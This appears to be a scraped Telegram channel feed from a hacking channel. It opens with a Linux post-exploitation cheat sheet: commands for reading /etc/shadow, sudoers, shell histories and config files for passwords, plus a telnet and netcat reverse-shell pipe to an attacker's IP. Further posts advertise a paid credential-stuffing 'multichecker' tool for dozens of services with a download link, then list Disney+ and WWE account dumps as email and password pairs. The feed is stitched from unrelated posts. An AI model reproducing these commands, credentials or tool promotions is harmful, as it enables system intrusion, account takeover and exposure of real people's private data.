2021-05-12 08:27:10
What other users & hosts are communicating with the system?
lsof -i
lsof -i :80
grep 80 /etc/services
netstat -antup
netstat -antpx
netstat -tulpn
chkconfig --list
chkconfig --list | grep 3:on
last
w
Whats cached? IP and/or MAC addresses
arp -e
route
/sbin/route -nee
Is packet sniffing possible? What can be seen? Listen to live traffic
tcpdump tcp dst 192.168.1.7 80 and tcp dst 10.5.5.252 21
Note: tcpdump tcp dst [ip] [port] and tcp dst [ip] [port]
Have you got a shell? Can you interact with the system?
nc -lvp 4444 # Attacker. Input (Commands)
nc -lvp 4445 # Attacker. Ouput (Results)
telnet [attackers ip] 44444 | /bin/sh | [local ip] 44445 # On the targets system. Use the attackers IP!
Confidential Information & Users
Who are you? Who is logged in? Who has been logged in? Who else is there? Who can do what?
id
who
w
last
cat /etc/passwd | cut -d: -f1 # List of users
grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' # List of super users
awk -F: '($3 == "0") {print}' /etc/passwd # List of super users
cat /etc/sudoers
sudo -l
What sensitive files can be found?
cat /etc/passwd
cat /etc/group
cat /etc/shadow
ls -alh /var/mail/
Anything "interesting" in the home directorie(s)? If it's possible to access
ls -ahlR /root/
ls -ahlR /home/
Are there any passwords in; scripts, databases, configuration files or log files? Default paths and locations for passwords
cat /var/apache2/config.inc
cat /var/lib/mysql/mysql/user.MYD
cat /root/anaconda-ks.cfg
What has the user being doing? Is there any password in plain text? What have they been edting?
cat ~/.bash_history
cat ~/.nano_history
cat ~/.atftp_history
cat ~/.mysql_history
cat ~/.php_history
What user information can be found?
cat ~/.bashrc
cat ~/.profile
cat /var/mail/root
cat /var/spool/mail/root
t.me//blackhat504
sMAIO MULTICHECKER [PAID TOOL] SUPPORT 60+ MODULES
Modules :
Minecraft
NordVPN
VyprVPN
ZenMateVPN
HideMyAssVPN
ExpressVPN
Reddit
Hulu
Pornhub
CrunchyRoll
UPlay
ZorroVPN
TunnelBearVPN
IpVanishVPN
SmartProxies
Purse.io
Skinhub
PlexTV
Gyazo
Disney+
Chaturbate
WWE
Facebook
DirectTV
Instagram
myCANAL
Napster
IMVU
Duolingo
PornPortal
UFC
ROBLOX
MailAccess
AntiPublic
Wendys
PostMates
Funimation
McDonalds_US
GoDaddy
Chegg
GetUpside
RedTube
VirusTotal
Lovoo
GrubHub
OnlyFans
CallOfDutty
OVH
BuffaloWildWings
DoorDash
GFuel
WTFPass
AngelaWhite
HollyRandall
Steam
Battle.net
Acorns
SnapChat
https://www.upload.ee/files/12624926/smAIO_Multichecker.rar.html
Enjoy
t.me//blackhat504
Disney+ Premium Accounts
will.halstead@me.com:luke2twins
paulo-mlka@sfr.fr:Perfect81
dwhite38@gmail.com:dee382de
naschunke@yahoo.com:Golfer65
loan99home@gmail.com:Maddog31$
averyandmonty@gmail.com:spike007
isabelle.bayol@wanadoo.fr:Zaza1808
amiller419@twc.com:Nickym419
dollermanapsal@gmail.com:America12@
souljabalboamusic@gmail.com:Balboa1989
lamarbr@yahoo.com:Dmusique1
paubrannan@gmail.com:Newcanaan10
jessicacudd@yahoo.com:bunny7891
bretd87@gmail.com:princess88
neldridge62082@gmail.com:icecream420
jjsingh808@gmail.com:Jassie15
johanna@majorbriggs.se:Kitt2010
tasha.l.thorpe@gmail.com:aniya0619
walren@earthlink.net:Vanline1
dsdull@att.net:hunter11
jessbaumgardner@gmail.com:jess2009
peyton.dunn43@gmail.com:sunshine43
kylejohnson42011@yahoo.com:bdwvxb33
joseph.bicchieray@orange.fr:annalexa0509
rooneyhudson@aol.com:Perryhud44
austin.birdwell@gmail.com:liveordie3
WWE Premium Accounts
deenaipaul@gmail.com:Deewowz1
justincanady1@yahoo.com:Raiders1
trinity2187@aol.com:frankie12
maria_rccrd@yahoo.com:symbouras1
jackson.andre81@gmail.com:Jackson81
sartru@hotmail.com:leannt1992
jrb092779@gmail.com:jbboom927
aimee.gusman@yahoo.com:Hot4cards
kaeseng36@gmail.com:codblackops2
tom.garone@gmail.com:lacrosse2
woodsthomas87@yahoo.com:empire4ever
bennettcassi@yahoo.com:cjb1221
c.gallardo26@yahoo.com:america86
jefferyfranklin225@yahoo.com:tiger2158
xabbiehuberx@gmail.com:uzumaki1
@blackhat504
https://t.me/satish_k_samal
#ONEPLUS 7 Pro ORDER PLACED SUCCESSFULL
PRICE - 8,000/-
182 views05:27